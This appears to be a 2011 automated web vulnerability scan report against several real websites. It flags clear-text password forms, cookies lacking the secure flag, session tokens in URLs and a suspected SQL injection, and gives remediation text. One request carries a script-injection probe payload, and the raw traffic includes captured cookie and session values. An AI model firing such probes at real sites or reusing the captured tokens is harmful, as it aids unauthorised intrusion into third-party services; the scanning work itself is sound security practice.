HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:49:00 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Thu, 03 Feb 2011 20:01:19 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 34911
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.facebook.com/
The form contains the following password field:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://membercenter.made-in-china.com/logon.do
The form contains the following password field:
logonInfo.logPassword
Request
GET / HTTP/1.1 Host: www.made-in-china.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sfweekly.com/readers/login/
The form contains the following password field:
data[Reader][password]
Request
GET /2010-08-11/news/ihelp-for-autism/ HTTP/1.1 Host: www.sfweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.supertradeexchange.com/acct/login.asp
The form contains the following password field:
pwd
Request
GET / HTTP/1.1 Host: www.supertradeexchange.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13237 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/ Date: Thu, 03 Feb 2011 19:35:26 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>SuperTradeExchange® - a small business community and barter netwo ...[SNIP]... </h3> <form name="SignIn" action="/acct/login.asp" method="post" onkeyup="eval_button(event, this)"> <label for="login"> ...[SNIP]... </label> <input type="password" name="pwd" id="pwd"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.thefutoncritic.com/myfuton.aspx
The form contains the following password field:
password
Request
GET /devwatch/wright-vs-wrong/x22 HTTP/1.1 Host: www.thefutoncritic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:29:43 GMT Connection: close Content-Length: 20828
<html> <head> <title>Shows A-Z - wright vs wrong on abc | TheFutonCritic.com</title> <meta id="Meta_Description" name="Description" content="wright vs wrong on abc ... TheFutonCritic.com has wright ...[SNIP]... <td>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.thumbshots.com/Firefox.aspx
The form contains the following password field:
dnn$ctr753$Login$Login_DNN$txtPassword
Request
GET /Firefox.aspx HTTP/1.1 Host: www.thumbshots.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 44740 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:30:21 GMT Connection: close
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.
You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.
Issue remediation
The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat HTTP/1.1 Host: livechat.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/ Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 20:32:21 GMT Content-Length: 101191
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1 Host: appleid.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);
Redirecting to <a HREF="http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.">http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/sentryx/sign_in?_a=login.guestSign&c=f63ef1babc027e38d46ff1531c1e3f73&_fid=si&r=SXYD4UDAPXU7P7KXF&s=ba6fdbd16f511f7872ee65ac03f444f3&t=SXYD4UDAPXU7P7KXF HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.smartdevil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21218 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:36 GMT; path=/; HttpOnly Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:28:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Home.aspx HTTP/1.1 Host: www.smartdevil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:39 GMT; path=/; HttpOnly Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:28:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /SSLLogin.aspx HTTP/1.1 Host: www.smartdevil.com Connection: keep-alive Referer: https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx?returnurl=%2fdefault.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy.aspx HTTP/1.1 Host: www.smartdevil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 32544 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:28:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /terms.aspx HTTP/1.1 Host: www.smartdevil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 49241 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:28:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00029D)%3C%2Fscript%3E HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trafficSource="SP198c8\"; CstrStatus=U; campaign_track=BP%3AUpdate%20Your%20Profile%20Top
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the secure flag set:
language=en-US; path=/; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Products/ThumbshotsImages/IntegrationCode.aspx HTTP/1.1 Host: www.thumbshots.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35926 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
9. Session token in URLpreviousnext There are 12 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101 HTTP/1.1 Host: clicktoverify.truste.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:47:38 GMT Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4 X-Powered-By: PHP/5.1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 10084
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Validation Page for Online Privacy Certification by TRUSTe</title> <meta n ...[SNIP]... <div id="logo"><a href="//privacy-policy.truste.com/click-with-confidence/ctv/en/truste.com?PHPSESSID=3599fb7ea791916a827c0d96401f1083" target="_blank"><img style="border: none" src="//privacy-policy.truste.com/certified-seal/ctv/en/truste.com/seal.png" /> ...[SNIP]...
GET /pub/smart-devil/19/697/322/x22 HTTP/1.1 Host: qa.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/ Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:33:42 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:48:21 GMT Server: Server x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 350615
